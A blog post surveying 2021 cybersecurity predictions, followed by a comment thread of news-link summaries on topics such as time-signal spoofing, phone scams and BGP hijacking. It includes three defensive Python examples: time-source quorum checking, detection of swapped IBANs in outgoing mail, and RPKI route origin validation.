Nothing is more difficult than making predictions. For this reason I did not post any “predictions for 2021 cyber security” before 2021 started. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.
The state of internet security in 2020 was hard. The trends that stormed last year will continue well into 2021: “Rapidly accelerated digital transformations, opportunistic phishing campaigns, discontinuity of information security operations and financial constraints are creating the perfect storm in a COVID-19-disrupted world.” Last year's trend was that instead of ‘bring your own device’, these days it’s rather ‘bring your own office’.
2020 was a bumper year for cybercriminals, and this boom is expected to continue into 2021. The 2021 Cybersecurity and IT Failures Roundup article presents lessons learned from the many failures, interruptions, crimes and other IT-related setbacks that made the news in 2020. Smart cyber security people have read about them and learned their lesson.
Kaspersky’s top three cybersecurity predictions for 2021 are an increase in targeted attacks, attacks that are more disruptive and exploit contemporary issues, and continued frequent and significant data breaches. I can pretty much agree with those. Cybersecurity must adapt to counter new threats in a transformed world.
The Head of Europol’s European Cybercrime Centre: there are no systems that cannot be breached article says that humankind has to choose between evolution by digitization and stagnation. Naturally, the world is moving ahead. “We can’t be naive and expect that bad things will not happen along with it. Resilience is important.”
For 2021, Trend Micro predicts that cybercriminals will look to home networks as a critical launch pad for compromising corporate IT and IoT networks. The New Cybersecurity Threat Predictions for 2021 article points out that the traditional network perimeter has been replaced with multiple edge environments, WAN, multi-cloud, data center, remote worker, IoT, and more, each with its unique risks.
DDoS attacks: big rise in threats to overload business networks. Cyber attackers are threatening to take organisations offline with DDoS attacks if they aren’t paid bitcoin by a deadline, but victims are being urged not to give in to the demands.
One sure bet is that ransomware attacks will only escalate further this year. Pay-or-Get-Breached Ransomware Schemes Take Off in 2021. In 2020, ransomware attackers moved quickly to adopt so-called “double extortion” schemes: first they encrypt your data so you can’t access it, and then they threaten to publish your most secret data for other people to see if you don’t pay up. Ransomware victims that have backups are paying ransoms to stop hackers leaking their stolen data.
Modern cybercrime is becoming increasingly open-sourced, which means that some of the most sophisticated and notorious cybercriminals already use open-source tools to conduct their criminal activities, and this will increase.
Trend Micro survey results claim that AI is set to replace humans in cybersecurity by 2030. I am just wondering what this claim means and whether the people who answered the survey really understood AI and cyber security. My prediction is that we will need humans, AI and even traditional solutions for a long, long time.
The lack of people with cyber security skills is still a problem for many companies, because AI will not replace them any time soon. There are different views on how the situation has developed. The Cybersecurity Skills Shortage Falls for First Time article claims that the shortfall in skills has dropped from 4.07 million last year to 3.12 million. The As The End Of 2020 Approaches, The Cybersecurity Talent Drought Gets Worse article says that the information technology industry has a real problem on its hands, and it’s only getting worse. While cybercrime grows exponentially, businesses are facing a severe cybersecurity talent drought. The supply of available, qualified security professionals is insufficient and the competition for their services has dramatically increased. Some companies claim to have invented a “silver bullet” for educating cyber professionals, like This educator claims to have invented an entertaining way to learn cybersecurity. Some of the cyber security issues move to the cloud, so we need more people who know both security and cloud: The Cloud Talent Drought Continues (And Is Even Larger Than You Thought).
The Hackers leverage sophisticated and novel techniques to break into networks article tells that the recent SolarWinds and JetBrains attacks are prime examples of why state-sponsored attacks are so dangerous. The hackers leveraged sophisticated, novel techniques to break into networks and obtain backdoor access to government agencies and enterprises. Expect to see more break-ins connected to those incidents, and expect more similar incidents that have not yet been revealed.
Want to avoid having your online accounts hacked? Enable two-factor authentication. The Better than the best password: How to use 2FA to improve your security article tells that this is a crucial security measure that requires an extra step when signing in to high-value services. The article explains how to set up 2FA and which accounts to focus on first.
A new version of the OWASP Top 10 is coming this year. The OWASP Top-10 2021 Statistics-based proposal article tries to make OWASP Top-10 2021 predictions calculated by understandable metrics, so that everyone is able to reproduce the results, and presents them to the entire community for feedback.
The Privacy is an illusion. But that‘s a good thing article says that everyone’s information is available; it doesn’t matter who you are. Some people would pay lots of money to get that privacy illusion back and some just don’t care. The With the Death of Cash, Privacy Faces a Deeply Uncertain Future article says that in one future we have a private, anonymous alternative to cash, but in the Black Mirror future the money in your pocket knows everything about you. Cash is dying, that’s for sure. There are still ways to send anonymous emails, and it is a good idea to prepare for your digital life after death.
The Ransomware attacks will explode in 2021 article claims that the Capitol riot and its aftermath make the case for tech regulation more urgent, but no simpler. Against increased regulation there are freedom-of-speech issues like Should Jack Dorsey be able to silence the president of the United States? Whether the storming of the US Capitol was an attempted coup, an insurrection, or an assault on democracy is merely a question of semantics. The US is now the focus of global instability. The EU chief warns over ‘unfiltered’ hate speech and calls for Biden to back rules for big tech.
The Legal requirements for IoT security start to emerge article tells that legislative activities are starting to make security a legal requirement for consumer IoT designs, requiring vaguely defined “reasonable security features”. The US Government is beginning to create legislation mandating IoT security. The US House of Representatives, for instance, introduced H.R. 1668, The Internet of Things Cybersecurity Improvement Act of 2020. There are NIST recommendations such as NISTIR 8259, Foundational Cybersecurity Activities for IoT Device Manufacturers. The EU introduces a cyber security IoT standard to protect its citizens, and ENISA publishes Guidelines on Securing the IoT Supply Chain.
7 Cybersecurity Predictions for Smart Buildings and Infrastructure for 2021: continuous patch management and security updates, OT transparency for IT stakeholders, natively secure OT networks, cloud-based access to remote sites instead of VPN, zero-touch onboarding, more cybersecurity in small facilities, and certified cybersecurity products and solutions.
IoT security is still complicated. For many development teams, the idea of building cybersecurity into their IoT design can seem daunting. The 6 essential activities to help developers build in IoT cybersecurity article gives some ideas for improving cyber security in your IoT development.
2,203 Comments
Tomi Engdahl says:
Your Fingerprint Can Be Hacked For $5. Here’s How.
https://blog.kraken.com/post/11905/your-fingerprint-can-be-hacked-for-5-heres-how/
Tomi Engdahl says:
What Happens If Time Gets Hacked
https://www.darkreading.com/vulnerabilities-threats/what-happens-if-time-gets-hacked
Renowned hardware security expert raises alarm on the risk and dangers of cyberattackers targeting the current time-synchronization infrastructure.
BLACK HAT EUROPE 2021 – London – Most people take time synchronization for granted, but it operates on what hardware security expert Adam Laurie calls a “fragile ecosystem.” Laurie, a renowned hardware hacker, here today demonstrated an unnervingly simple way to alter time on a clock.
“I was curious if I could spoof the time” synchronization signal, he explained in a keynote on his research. So he built his own simulated time-signal system using an open source tool called txtempus, which simulates signals for syncing the time on clocks and watches, and ran it on a Raspberry Pi outfitted with a radio-frequency identification (RFID) antenna.
Laurie’s contraption overrode the UK region’s official low-frequency, radio broadcast-based clock synchronization signal.
The white clock was set to operate normally, communicating with the Network Time Protocol (NTP) that transmits local atomic clock broadcasts to timekeeping devices. The red clock was also set to communicate with the National Physical Laboratory, the UK atomic clock feed, via NTP, but Laurie commandeered the feed on that link.
“I overrode the signal” and forced it to display the incorrect time, he said in an interview.
The hack underscored how easily RFID can be abused and how that potentially could wreak havoc by altering time on a wider scale. And unlike other security issues, this risk to time-hacking isn’t rooted in software or hardware vulnerabilities: It’s more about an aging technology and process.
“It’s more of an existential vulnerability because it’s the way the technology evolved and the way it was adopted before anyone was worrying that it’s not an actual secure method,” said Laurie, whose time research is independent of his employer IBM X-Force, where he is the lead hardware hacker.
Time Out
Correct time synchronization affects wide swaths of society: everything from financial transactions that rely on accurate timing of payments, to industrial systems, forensics, and time-stamped network packets on the Internet. Internet of Things (IoT) devices rely on the atomic clock. In his keynote, Laurie cited a 2017 UK report that estimated the cost of time-synchronization failure was a stunning 1 billion British pounds per day.
He also noted government and industry efforts to shore up the security of time synchronization, including that of The Resilient Navigation and Timing Foundation, an international nonprofit advisory council. The foundation has proposed hardening GPS and Global Navigation Satellite System (GNSS) systems to protect against spoofing and jamming of signals, and adding legal teeth to enforce it.
The Internet’s NTP and PTP distribute time updates and currently could be duped into transmitting spoofed information, he pointed out.
“They’re not the source of time, but they need the external source that tells them the time,” namely the atomic clock, which broadcasts over RF and GPS, Laurie explained.
Ransomware attacks are an obvious threat here, he added.
“If I can take out a financial organization by DOS’ing their atomic clock feed, that would be a very powerful attack,” he said.
“The strongest signal wins, and there’s no authentication” in most of these transmissions, he said. There are technologies for validating signals, but most of the existing RF infrastructure remains insecure, he added.
“There’s a huge, deployed infrastructure that relies on these insecure technologies. This [time] is one of those hidden nasties waiting to bite us,” he said.
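The practical defence against a "strongest signal wins, no authentication" feed is not to let any single source steer the clock. The added example below (my own illustration, not code from Laurie's talk or the Dark Reading article) takes offsets measured against several independent sources, keeps only the largest agreeing group, and refuses to adjust the clock unless a quorum agrees; a lone feed pushed an hour ahead, as in the demo above, is reported as suspect instead of applied. The source names and offsets are constructed sample values.

```python
"""Multi-source time sanity check, added to illustrate a defence against the
unauthenticated time feeds described above. Not code from the talk or the
article; SAMPLES are constructed values."""
import statistics
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class TimeSample:
    source: str       # label: NTP server, GPS receiver, LF radio clock, ...
    offset_ms: float  # that source's clock minus the local clock, in ms


def select_truechimers(samples: List[TimeSample], tolerance_ms: float) -> Tuple[List[TimeSample], List[TimeSample]]:
    """Split samples into the largest agreeing group and the rest. A source
    joins a group if its offset lies within tolerance_ms of the group's anchor
    sample; this is a simplified stand-in for NTP's intersection/clustering
    algorithms that separate truechimers from falsetickers."""
    best: List[TimeSample] = []
    for anchor in samples:
        group = [s for s in samples if abs(s.offset_ms - anchor.offset_ms) <= tolerance_ms]
        if len(group) > len(best):
            best = group
    outliers = [s for s in samples if s not in best]
    return best, outliers


def audit_time_sources(samples: List[TimeSample], tolerance_ms: float = 50.0, quorum: int = 3) -> dict:
    """Decide whether the local clock may be adjusted. Only the median of a
    quorum of agreeing independent sources is trusted; a source that disagrees
    with the majority (for example a spoofed radio or GPS feed) is listed as
    suspect and never applied. Without a quorum the clock is held and an alert
    is raised rather than guessing."""
    agreeing, outliers = select_truechimers(samples, tolerance_ms)
    report = {
        "trusted_offset_ms": None,
        "agreeing": [s.source for s in agreeing],
        "suspect": [s.source for s in outliers],
        "action": "hold-and-alert",
    }
    if len(agreeing) >= quorum:
        report["trusted_offset_ms"] = statistics.median([s.offset_ms for s in agreeing])
        report["action"] = "adjust"
    return report


# Constructed sample: three independent sources agree to within a few ms,
# while the low-frequency radio clock feed has been pushed one hour ahead.
SAMPLES = [
    TimeSample("ntp-pool-a", 1.2),
    TimeSample("ntp-pool-b", -0.8),
    TimeSample("gps-receiver", 0.4),
    TimeSample("radio-msf", 3_600_000.0),
]

if __name__ == "__main__":
    print(audit_time_sources(SAMPLES))
```

The quorum matters as much as the outlier logic: with only two sources a spoofed one cannot be told from a correct one, so the right action is to hold the clock and alert, which is what the second scenario in the test exercises.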
Tomi Engdahl says:
Does Windows 10 need a separate antivirus program? 21 alternatives were tested, here is how it went
27.11.2021 11:37 | updated 27.11.2021 11:37
AV-Test tested a total of 21 different security solutions for Windows.
https://www.mikrobitti.fi/uutiset/tarvitseeko-windows-10-erillista-virustorjuntaohjelmaa-21-vaihtoehtoa-testattiin-nain-kavi/486ebeed-2098-4ef4-9582-d7cbd2ea2adb
Many critics turn up their noses at Microsoft's own Windows Defender, which ships as part of the Windows 10 operating system. Perhaps they shouldn't, since the antivirus did better than excellently in the independent AV-Test's comprehensive test, which included a total of 21 different security solutions.
Windows Defender's score was 18 points, and the application was ranked among the best options. In practice, Microsoft's own security program is more than enough for a basic Windows 10 user, and there is hardly any particular reason to buy a paid solution.
https://www.av-test.org/en/antivirus/home-windows/
Microsoft Defender is amongst the best antiviruses for Windows 10, Windows 11
https://www.windowslatest.com/2021/11/27/microsoft-defender-is-amongst-the-best-antiviruses-for-windows/
Tomi Engdahl says:
Introducing App Tracking Protection for Android: The easiest way to block trackers lurking in your apps
https://spreadprivacy.com/introducing-app-tracking-protection/
DuckDuckGo is launching App Tracking Protection for Android into beta, a new feature in our existing app that will block third-party trackers like Google and Facebook lurking in other apps.
Join the private waitlist from our Android app today and help shape the future of App Tracking Protection!
DuckDuckGo wants to stop apps tracking you on Android
The latest update promises to block invasive data collection across your whole phone.
https://www.wired.com/story/duckduckgo-android-app-tracking-block/
Tomi Engdahl says:
Hands-On with DuckDuckGo App Tracking Protection
https://www.thurrott.com/cloud/259520/hands-on-with-duckduckgo-app-tracking-protection
Last week, DuckDuckGo announced that it was adding App Tracking Protection to its mobile app on Android, and the firm was nice enough to give me an invite to the beta. And from what I can tell over several days of usage, this feature works quite well. And I’m more than a bit troubled by the secret tracking activity it’s discovered—and blocked—on my phone.
Tracking protection is simple enough on the desktop, at least for web apps: just install an extension like uBlock Origin or DuckDuckGo Privacy Essentials and you’re good to go. Mobile, of course, is a bit trickier. On the iPhone, Apple added privacy controls, including mobile app anti-tracking functionality, in iOS 14.5 back in April. But we’re unlikely to see anything like that on Android. Google, after all, makes the vast majority of its revenues from advertising, and that requires them to allow tracking throughout Android.
Tomi Engdahl says:
Advanced Virtual CISO for Remote Teams
https://pentestmag.com/advanced-virtual-ciso-for-remote-teams/
The Virtual Chief Information Security Officer (vCISO) is becoming a preferred solution for small, medium, and even some large businesses. For those who are not familiar with the vCISO I will share what this role actually is, and then step into what makes up an AvCISO.
What is a vCISO?
A good description of a vCISO is “a service designed to make top-tier security analysts available to your organization for security expertise and guidance.” Many small organizations often mistakenly think they don’t have the need for top-tier security analysts or that they’re too small to be targeted by attackers. The bad news: industry compliance requirements don’t agree, and attackers view you as an easy target.
Above the ‘Covered Entity’ is the regulated company, and they are required to provide a CISO that is “employed by the Covered Entity, one of its Affiliates or a Third Party Service Provider”. Hence, the birth of the Virtual Chief Information Security Officer.
In case you’re wondering, “a vCISO is no different than a full-time chief information security officer except a vCISO is an outsourced security advisor and not onsite full time. A CISO is generally a senior-level executive who is responsible for establishing and maintaining the enterprise vision, strategy, and program to ensure information assets and technologies are adequately protected.”
When combining all of the expectations, roles, responsibilities, and expertise required of a CISO, it becomes clear that the need for a third party Virtual CISO is often an ideal solution. Smaller organizations often don’t have a need for a full time CISO, and the cost of a full time headcount can put this out of reach. However, this does not eliminate the need for developing solutions for remote teams, implementing managed services that can provide policy & compliance overview, close visibility gaps, identify & mitigate security vulnerabilities, and investigate breaches which are the roles that make up the building blocks of what we call the AvCISO or ‘Advanced Virtual Chief Information Security Officer’.
Tomi Engdahl says:
White House Blacklists 8 Chinese Quantum Computing Companies Citing National Security Risks: Report
https://dailyhodl.com/2021/11/28/white-house-blacklists-8-chinese-quantum-computing-companies-citing-national-security-risks-report/
The Biden Administration has announced that it is blacklisting eight Chinese quantum computing companies over concerns that the technology they possess poses a threat to national security.
The companies have been added to the U.S. Department of Commerce’s Entity List, which is a national security tool used by the Bureau of Industry and Security (BIS).
Tomi Engdahl says:
Highly Anonymous Squid Proxy Configuration for Linux.
https://github.com/ind3p3nd3nt/AnonSquid
Tomi Engdahl says:
Digging into Google’s push to freeze ePrivacy
Across Europe, big adtech’s reach has grown long indeed…
https://techcrunch.com/2021/11/01/digging-into-googles-push-to-freeze-eprivacy/
Tomi Engdahl says:
Tales of the Oldhat: Johnny’s First Red Box
https://hacker-ethic.flynnos.org/2021/10/31/tales-of-the-oldhat-johnnys-first-red-box/
Tomi Engdahl says:
Free Tool Scans Web Servers for Vulnerability to HTTP Header-Smuggling Attacks
https://www.darkreading.com/application-security/free-tool-scans-web-servers-for-vulnerability-to-http-header-smuggling-attacks
A researcher will release an open source tool at Black Hat Europe next week that roots out server weaknesses to a sneaky type of attack.
Tomi Engdahl says:
https://pudding.cool/2021/10/lenna/
In 2021, sharing content is easier than ever. Our lingua franca is visual: memes, infographics, TikToks. Our references cross borders and platforms, shared and remixed a hundred different ways in minutes. Digital culture is collective by default.
But as the internet reaches its “dirty 30s,” what happens when pieces of digital culture that have been saved, screenshotted, and reposted for years need to retire? Let’s dig into the story of one of these artifacts: The Lenna image.
The Lenna image may be relatively unknown in pop culture today, but in the engineering world, it remains an icon.
Lena Forsén, the real human behind the Lenna image, was first published in Playboy in 1972. Soon after, USC engineers searching for a suitable test image for their image processing research sought inspiration from the magazine. They deemed Lenna the right fit and scanned the image into digital, RGB existence.
Tomi Engdahl says:
Millions of euros have vanished with phone scammers – Traficom and telecom operators are preparing new means to prevent the crimes
Economy 29.11.2021
Nikke Kinnunen
https://www.maaseuduntulevaisuus.fi/talous/artikkeli-1.1659633?fbclid=IwAR097wtbOsN0-m5GReO3tSx5l0uf4PCtAPmxby8KY96XsB-upcSIhiPdXOU
In the scams, criminals disguise the call to look as if it had been made from a Finnish number.
Scam calls are a significant problem. According to the National Bureau of Investigation, Finns lost 7.1 million euros to technical support scam calls in 2020 and 2021.
Finnish telecom operators are obliged to ensure that a call made in Finland carries the correct number.
However, it is currently not possible to verify the caller of calls made from abroad. Thus the operator also cannot verify whether the caller has the right to use the Finnish number presented.
Traficom has begun preparing, together with the telecom operators, means by which these scam calls will be blocked. In the future the operator can ensure that the numbers are genuine. The call recipient, in turn, can be sure that a call from a Finnish number really is made from a Finnish subscription.
In addition, the subscription owner does not need to worry about their number being used for scams.
Altering the number to look Finnish is popular among scammers, because victims are then much more likely to answer the call.
Typically scam calls are disguised as, for example, technical support calls or bank support calls. In these, the criminal poses as, for example, a technical support or bank employee and asks for online banking credentials or permission to establish a remote connection to the victim's computer.
Tomi Engdahl says:
A record sum of money has been swiped from Finns online – expert warns of a cunning online scam https://www.is.fi/digitoday/art-2000008434865.html
A record amount of euros has been swiped from Finns this year in various online scams. According to the police, the combined loss from the scams is over 35 million euros.
Old scam trick on the move again: the account number in an email changes and the scammer takes the money https://www.kauppalehti.fi/uutiset/vanha-huijauskikka-jalleen-liikkeella-tilinumero-sahkopostissa-vaihtuu-ja-huijari-vie-rahat/0f61510e-aafa-4ef3-90c5-f49c83a6bded
A years-old trick still circulates online and infects systems. IT entrepreneur Mikko Aaltonen warns on LinkedIn about malware he has encountered at two of his customers.
It is a piece of malware that has infected Outlook and that recognises a bank account number in an outgoing email and swaps it for another. In one of the cases Aaltonen mentions, an employee had reported their own account number to the payroll clerk; in the other, the case involved a company doing international trade.
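The malware described above replaces a genuine account number with one that is itself well-formed, so a checksum test alone will not catch it; what does catch it is comparing every account number in outgoing mail against the number already on file for that payee. The added example below (my own illustration, not code from the article or from Aaltonen) does both: it finds IBAN-looking strings in a message body, validates the ISO 13616 mod-97 check digits, and flags any valid IBAN that differs from the payee directory. The directory, recipient address and message bodies are constructed; the IBANs are the standard Finnish and UK example numbers.

```python
"""Outbound-mail check for swapped bank account numbers, added to illustrate a
control against the account-number-swapping malware described above. Not code
from the article; PAYEES and the sample messages are constructed."""
import re
from typing import Dict, List, Tuple

# IBAN written with or without spaces, e.g. "FI21 1234 5600 0007 85". Real
# deployments should also enforce the per-country length table.
IBAN_RE = re.compile(r"\b[A-Z]{2}\d{2}(?:[ ]?[A-Z0-9]){11,30}\b")


def normalize_iban(raw: str) -> str:
    return raw.replace(" ", "").upper()


def iban_checksum_ok(iban: str) -> bool:
    """ISO 13616 mod-97 check: move the first four characters to the end,
    replace each letter by 10..35, and the resulting integer mod 97 must be 1."""
    rearranged = iban[4:] + iban[:4]
    digits = "".join(str(ord(ch) - 55) if ch.isalpha() else ch for ch in rearranged)
    return int(digits) % 97 == 1


def audit_outgoing_mail(body: str, recipient: str, payees: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (finding, iban) pairs for every IBAN in an outgoing message.
    'invalid'       - check digits wrong (typo or garbled number)
    'mismatch'      - well-formed but not the number on file for this payee,
                      which is exactly what the swapping malware produces
    'unknown_payee' - no number on file, needs out-of-band confirmation"""
    findings = []
    for match in IBAN_RE.finditer(body):
        iban = normalize_iban(match.group(0))
        if not iban_checksum_ok(iban):
            findings.append(("invalid", iban))
        elif recipient not in payees:
            findings.append(("unknown_payee", iban))
        elif payees[recipient] != iban:
            findings.append(("mismatch", iban))
    return findings


# Constructed payee directory: what payroll already has on file for this sender.
PAYEES = {"payroll@example.com": "FI2112345600000785"}

# Constructed messages: the genuine one, one altered in transit, one with a typo.
MSG_GENUINE = "Hi, my salary account is FI21 1234 5600 0007 85. Thanks"
MSG_SWAPPED = "Hi, my salary account is GB82 WEST 1234 5698 7654 32. Thanks"
MSG_TYPO = "Hi, my salary account is FI21 1234 5600 0007 86. Thanks"

if __name__ == "__main__":
    for msg in (MSG_GENUINE, MSG_SWAPPED, MSG_TYPO):
        print(audit_outgoing_mail(msg, "payroll@example.com", PAYEES))
```

Where such a check runs matters: on the sending side it has to run after the mail client has assembled the message (on a gateway, not inside the compromised Outlook), and on the receiving side the payroll or accounts-payable system is the natural place, since that is where the number on file lives.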
Tomi Engdahl says:
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
Humans play a critical role in cybersecurity, and they’re often termed the “weakest link.” Cisco’s 2021 Cyber Security Threat Trends report reveals an alarming dominance of phishing attacks, accounting for 90% of data breaches. How can employers raise the bar in avoiding the exploitation of human behavior or psychology? And how can we have a better-integrated approach to security?
Humans certainly are the weakest link in cybersecurity. Usually because of negligence, but sometimes because of insider threats. The one consistent statistic I encounter every year is that phishing attacks account for most successful breaches. It is because phishing is easy to do for hackers, and it works. It used to be that you would get an email from a prince in a faraway land saying that he needs your bank account number to deposit funds. Now, a phish may appear to be a message from your boss, from a store where you shop, a bank, or even a friend. Hackers have come a long way in being able to mimic graphics and logos; they use social engineering to gain knowledge of your work, interests, and friend groups on social media platforms.
Companies can raise the bar by doing regular training with employees on how to recognize a phish. They need to teach the psychology of human behavior and where the vulnerabilities may lie in networks and devices from people. Gamification is a popular tool for that kind of training. Corporate programs need to include cyber hygiene to include strong passwords, multi-factor authentication, and incident response as a part of their operational mission. Also, if they must, they can restrict who has access to databases and sites on the interest via identity and access management tools. For insider threats, monitoring aberrant behaviors can work, but it is a challenge.
Tomi Engdahl says:
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools. SolarWinds was more than a wakeup call for those realities.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Tomi Engdahl says:
Tell us your top three cyberthreat predictions for 2022.
• Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
Tomi Engdahl says:
How SASE can help secure your network against online threats
https://brand-studio.fortune.com/vmware/How-sase-can-help-secure-your-network-against-online-threats/?prx_t=eQIHAAAAAAoPEQA&fbclid=IwAR19J5sUmPQjOTPLLTNpmKdc8g3doFUvh6tx-yiNKRoJX30YFNaxeLnSF0g
VMware’s cloud-based secure access service edge solutions provide speed and security for working from anywhere.
Safeguarding cloud-native organizations at potential points of network failure, while maintaining productivity at scale, is a complex challenge that demands an equally cloud-native solution.
Nearly two years into the COVID-19 pandemic, and even as seven out of 10 white-collar workers continue to do their jobs remotely, many still struggle to productively collaborate online. And with teams spread across cloud networks, the threat of a cybersecurity breach is increased: By 2025, cybercrime such as intellectual property theft, ransomware, and fraud could cost global organizations as much as $10.5 trillion annually. Safeguarding cloud-native organizations at potential points of network failure, while maintaining productivity at scale, is a complex challenge that demands an equally cloud-native solution.
Tomi Engdahl says:
BGP Hijacking Attack – Pentestmag
https://pentestmag.com/bgp-hijacking-attack/
BGP is a routing protocol that connects larger groups of networks worldwide known as Autonomous Systems such as ISP providers, large tech enterprises, or government agencies.
It is simply the glue that connects the Internet together.
BGP is used for reachability information and routing data packets from one large network to another.
BGP hijacking is sending traffic to a different destination than the real intended one to intercept the packets.
Today, we learned about the BGP routing protocol and how it’s easy for any AS system to advertise specific IP ranges that claim the shortest paths to the target destinations and perform hijack attacks. Also, we demonstrated the impact of such hijacks through the MITM attack targeting the FTP client credentials.
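The defence the article's scenario calls for is Route Origin Validation: a router checks each received announcement against the signed Route Origin Authorizations (ROAs) published through RPKI before it will accept the route. The added example below (my own illustration, not code from the Pentestmag article) implements the RFC 6811 validation states, valid, invalid and unknown, and a typical acceptance policy on top of them. The ROAs and announcements are constructed, using documentation prefixes and private AS numbers, and a more-specific announcement beyond the ROA's maxLength is treated as invalid just as a wrong origin AS is.

```python
"""Route Origin Validation (RFC 6811 semantics), added to illustrate the
defence against the BGP origin hijacks described above. Not code from the
article; ROAS and ANNOUNCEMENTS are constructed."""
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass(frozen=True)
class ROA:
    prefix: str   # authorised prefix, e.g. "203.0.113.0/24"
    max_len: int  # longest prefix length the holder allows to be announced
    asn: int      # origin AS authorised to announce it


def validate_origin(announced_prefix: str, origin_asn: int, roas: Iterable[ROA]) -> str:
    """Classify one BGP announcement:
    unknown - no ROA covers the prefix, RPKI has no opinion
    valid   - a covering ROA names this origin AS and permits this length
    invalid - ROAs cover the prefix but none matches: wrong origin AS
              (classic hijack) or a more-specific beyond maxLength"""
    net = ipaddress.ip_network(announced_prefix, strict=False)
    covered = False
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix, strict=False)
        if net.version != roa_net.version or not net.subnet_of(roa_net):
            continue
        covered = True
        if roa.asn == origin_asn and net.prefixlen <= roa.max_len:
            return "valid"
    return "invalid" if covered else "unknown"


def accepted_routes(announcements: Iterable[Tuple[str, int]], roas: Iterable[ROA],
                    drop_unknown: bool = False) -> List[Tuple[str, int]]:
    """Common operator policy: drop invalid, keep valid, and keep unknown
    unless the operator chooses to reject unsigned address space as well."""
    roas = list(roas)
    kept = []
    for prefix, asn in announcements:
        state = validate_origin(prefix, asn, roas)
        if state == "valid" or (state == "unknown" and not drop_unknown):
            kept.append((prefix, asn))
    return kept


# Constructed ROAs: AS64500 holds 203.0.113.0/24 (no more-specifics allowed)
# and 2001:db8::/32 (may be announced down to /48).
ROAS = [ROA("203.0.113.0/24", 24, 64500), ROA("2001:db8::/32", 48, 64500)]

# Constructed announcements: the legitimate route, a hijack from another AS,
# a more-specific hijack, and a prefix with no ROA at all.
ANNOUNCEMENTS = [
    ("203.0.113.0/24", 64500),
    ("203.0.113.0/24", 64501),
    ("203.0.113.128/25", 64500),
    ("198.51.100.0/24", 64502),
]

if __name__ == "__main__":
    for prefix, asn in ANNOUNCEMENTS:
        print(prefix, asn, validate_origin(prefix, asn, ROAS))
    print("accepted:", accepted_routes(ANNOUNCEMENTS, ROAS))
```

Note what ROV does and does not cover: it rejects announcements whose origin AS is wrong, but an attacker who forges the correct origin AS and prepends it to a hijacked path still passes origin validation; catching that requires path validation, which is what BGPsec and ASPA are for.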
Tomi Engdahl says:
PWN methodology — LINUX – Pentestmag
https://pentestmag.com/pwn-methodology-linux/
Current methodology for approaching targets during binary exploitation on Linux OS.
Tomi Engdahl says:
Huge fines and a ban on default passwords in new UK law
https://www.bbc.com/news/technology-59400762
The government has introduced new legislation to protect smart devices in people’s homes from being hacked. Default passwords for internet-connected devices will be banned, and firms which do not comply will face huge fines.
Tomi Engdahl says:
Google: Half of compromised cloud instances have weak or no passwords
https://www.zdnet.com/article/google-half-of-compromised-cloud-instances-have-weak-or-no-passwords/
Online criminals are deploying cryptocurrency miners within just 22 seconds of compromising misconfigured cloud instances running on Google Cloud Platform (GCP).
Tomi Engdahl says:
You don't use any of these passwords, do you? You can be hacked in under a second https://www.is.fi/digitoday/tietoturva/art-2000008418043.html
Swear words and excrement will do as passwords for many Finns. Perhaps they shouldn't. Finland's most popular passwords have been listed. Password manager NordPass published, in addition to its normal global list, country-specific lists, now also for Finland. In the Finnish top 20 there are several swear words and also the thing itself.
Tomi Engdahl says:
Does Windows 10 need a separate antivirus program? 21 alternatives were tested, here is how it went | Mikrobitti
https://www.mikrobitti.fi/uutiset/tarvitseeko-windows-10-erillista-virustorjuntaohjelmaa-21-vaihtoehtoa-testattiin-nain-kavi/486ebeed-2098-4ef4-9582-d7cbd2ea2adb
Microsoft Defender is amongst the best antiviruses for Windows 10, Windows 11
https://www.windowslatest.com/2021/11/27/microsoft-defender-is-amongst-the-best-antiviruses-for-windows/
Windows Defender, which comes pre-installed on Windows 10 and Windows 11, is amongst the best antiviruses in 2021. That’s according to AV-TEST, which is an independent IT security institute that performs various tests to rank antivirus programs based on performance, security and other factors.
Tomi Engdahl says:
